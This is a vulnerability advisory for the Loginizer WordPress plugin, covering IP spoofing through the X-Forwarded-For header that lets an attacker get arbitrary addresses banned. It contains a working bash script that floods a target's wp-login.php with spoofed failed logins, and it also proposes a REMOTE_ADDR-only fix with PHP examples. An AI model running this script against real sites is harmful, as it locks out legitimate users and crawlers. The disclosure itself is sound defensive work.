Affected plugin | Loginizer |
Active installs | 1+ million |
Vulnerable version | <= 1.7.3 |
Audited version | 1.7.3 |
Fully patched version | – |
Recommended remediation | Removal of the plugin |
Description
An attacker can spoof the client IP address the plugin reads and so make it ban arbitrary addresses: search-engine crawlers, the site’s reverse proxy, or legitimate users. The attacker’s own address is never banned, so the result is a denial of service against everyone but the attacker.
The attack only works if the site administrator has configured the plugin to read the client IP from a source other than REMOTE_ADDR (for example the HTTP_X_FORWARDED_FOR header), which the plugin offers as a setting.
Proof of concept
Configure the plugin to use the HTTP_X_FORWARDED_FOR header as its IP source.
Run the following bash script.
#!/usr/bin/env bash
# ban-random-ips.sh
# Sends bursts of failed logins, each tagged with a random spoofed
# X-Forwarded-For address, so that the plugin bans the spoofed address
# instead of the attacker's real one.
TARGET_DOMAIN="$1"
TOTAL_IPS="${2:-100}"        # how many spoofed addresses to get banned
SLEEP="${3:-0.1}"            # pause between requests, in seconds
REAL_USER_IP=147.93.33.75    # attacker's real address, appended as the last hop

for ((ips=1; ips <= TOTAL_IPS; ips++))
do
IP=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))")
# Four failed attempts per address: enough to trigger the plugin's lockout.
for (( i = 0; i < 4; i++ )); do
curl -s -X POST "https://$TARGET_DOMAIN/wp-login.php" \
-H "X-Forwarded-For: $IP, $REAL_USER_IP" \
-d "log=admin" \
-d "pwd=foo" > /dev/null
sleep "$SLEEP"
echo "$ips/$TOTAL_IPS - attempt $i - $IP"
done
done
bash ban-random-ips.sh target-site.com 100
Now, go to the plugin’s dashboard:
The plugin banned 70 different IP addresses. However, the attacker’s IP address is not banned.
==> This proves that the plugin is vulnerable to IP spoofing: the banned addresses are the attacker-chosen values from the X-Forwarded-For header, not the address of the host that actually sent the requests.
The vulnerable function is called lz_getip.
Proposed patch
This is described at length in our separate article on the subject.
Summary: only ever read the client IP from REMOTE_ADDR, which the web server sets from the TCP peer and which an HTTP client cannot forge. If the site sits behind a reverse proxy, let the web server rewrite REMOTE_ADDR from the proxy’s header for connections coming from that proxy only (Apache mod_remoteip, nginx real_ip module), rather than trusting request headers inside the plugin.
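As an added illustration for this advisory (not Loginizer’s own code; the plugin’s real lz_getip is not reproduced here), the two patterns side by side in PHP: a lookup whose source is an admin-chosen header, and one that only consults REMOTE_ADDR. The function names, the constructed request array and the 203.0.113.42 address are assumptions for the example:

```php
<?php
// Added example for this advisory; both functions are assumptions about the
// two patterns, not the plugin's implementation.

// Vulnerable pattern: the IP source is a setting. When an administrator picks
// HTTP_X_FORWARDED_FOR, the first comma-separated entry is whatever the HTTP
// client chose to send, so the attacker decides which address gets banned.
function example_getip_vulnerable(array $server, string $source = 'REMOTE_ADDR'): string
{
    $raw = $server[$source] ?? '';
    // X-Forwarded-For is "client, proxy1, proxy2, ..."; the left-most entry
    // is client-controlled.
    return trim(explode(',', $raw)[0]);
}

// Hardened pattern: REMOTE_ADDR only. The web server fills it from the TCP
// peer address, which an HTTP client cannot forge. Behind a reverse proxy,
// have the web server rewrite REMOTE_ADDR (mod_remoteip / ngx_http_realip_module)
// for connections from the proxy only; do not parse headers in the plugin.
function example_getip_hardened(array $server): string
{
    $ip = $server['REMOTE_ADDR'] ?? '';
    // Reject anything that is not a literal IPv4/IPv6 address.
    return filter_var($ip, FILTER_VALIDATE_IP) !== false ? $ip : '';
}

// Constructed request mirroring the proof of concept: the attacker's real
// address is 147.93.33.75 and it prepends a random spoofed address.
$request = [
    'REMOTE_ADDR'          => '147.93.33.75',
    'HTTP_X_FORWARDED_FOR' => '203.0.113.42, 147.93.33.75',
];

echo "header-based: ", example_getip_vulnerable($request, 'HTTP_X_FORWARDED_FOR'), PHP_EOL;
echo "REMOTE_ADDR:  ", example_getip_hardened($request), PHP_EOL;
```

With that request the header-based lookup returns the attacker-chosen 203.0.113.42, which is the address the plugin would lock out, while the REMOTE_ADDR lookup returns 147.93.33.75, the host that actually sent the failed logins. This is exactly the mismatch the dashboard screenshot shows: many banned addresses, none of them the attacker’s.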
Timeline
Vendor contacted | September 11, 2022 |
First Response | – |
Fully patched at | – |
Publicly disclosed | April 24, 2023 |